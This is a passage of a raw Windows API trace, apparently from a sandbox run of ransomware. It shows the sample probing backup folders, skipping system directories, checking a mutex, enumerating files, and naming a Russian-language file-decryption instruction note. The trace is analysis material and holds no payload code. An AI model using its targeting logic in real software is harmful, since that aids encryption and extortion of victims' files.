ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@퍴X企@\x18㥔X\x18;")) returned 0xffffffff [0109.220] GetLastError () returned 0x2 [0109.220] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0109.221] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@鳜W企@\x18㩄X\x18D")) returned 0xffffffff [0109.221] GetLastError () returned 0x2 [0109.223] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0109.223] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@麌W企@\x18퍴X\x18j")) returned 0xffffffff [0109.224] GetLastError () returned 0x2 [0109.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0109.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0109.224] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@鳜W企@\x18㥔X\x18q")) returned 0xffffffff [0109.224] GetLastError () returned 0x2 [0109.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\퍰X\x90") returned 6 [0109.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0109.225] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@刄X企@\x18㩄X\x18y")) returned 0xffffffff [0109.225] GetLastError () returned 0x2 [0109.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0109.225] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@V企@\x18㥔X\x18\x81")) returned 0xffffffff [0109.225] GetLastError () returned 0x2 [0109.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0109.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@鳜W企@\x18㩄X\x18\x88")) returned 0xffffffff [0109.226] GetLastError () returned 0x2 [0109.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㥐X ") returned 6 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0109.227] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@刄X企@\x18㥔X\x18\x8f")) returned 0xffffffff [0109.227] GetLastError () returned 0x2 [0109.227] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㩀X ") returned 6 [0109.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0109.228] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@V企@\x18㩄X\x18\x97")) returned 0xffffffff [0109.228] GetLastError () returned 0x2 [0109.228] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.228] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.229] GlobalLock (hMem=0x450004) returned 0x591988 [0109.229] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.229] GlobalUnlock (hMem=0x450004) returned 0 [0109.229] GlobalLock (hMem=0x450004) returned 0x591988 [0109.229] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.229] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.229] GlobalUnlock (hMem=0x450004) returned 0 [0109.229] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.229] GlobalUnlock (hMem=0x45000c) returned 0 [0109.229] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.229] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.229] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.229] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.229] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.229] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0109.230] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.230] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.230] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.230] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.230] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.230] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a38, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.230] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.230] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.230] GlobalUnlock (hMem=0x45000c) returned 0 [0109.231] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.231] GlobalLock (hMem=0x450004) returned 0x593998 [0109.231] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.231] GlobalUnlock (hMem=0x45000c) returned 0 [0109.231] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.231] GlobalUnlock (hMem=0x450004) returned 0 [0109.231] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.231] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.231] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.231] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.232] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.233] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0109.233] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0109.233] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0109.234] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0109.234] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.234] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.234] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0109.235] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0109.235] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.236] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.236] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.236] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.236] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.236] GlobalLock (hMem=0x450004) returned 0x591988 [0109.236] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.236] GlobalUnlock (hMem=0x450004) returned 0 [0109.236] GlobalLock (hMem=0x450004) returned 0x591988 [0109.321] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.321] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.321] GlobalUnlock (hMem=0x450004) returned 0 [0109.321] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.321] GlobalUnlock (hMem=0x45000c) returned 0 [0109.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.322] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.322] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0109.322] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.322] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.322] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.322] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.322] GlobalUnlock (hMem=0x45000c) returned 0 [0109.322] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.322] GlobalLock (hMem=0x450004) returned 0x593998 [0109.322] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.322] GlobalUnlock (hMem=0x45000c) returned 0 [0109.322] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.322] GlobalUnlock (hMem=0x450004) returned 0 [0109.322] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.322] CharLowerBuffW (in: lpsz="msgfilt.dll", cchLength=0xb | out: lpsz="msgfilt.dll") returned 0xb [0109.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, 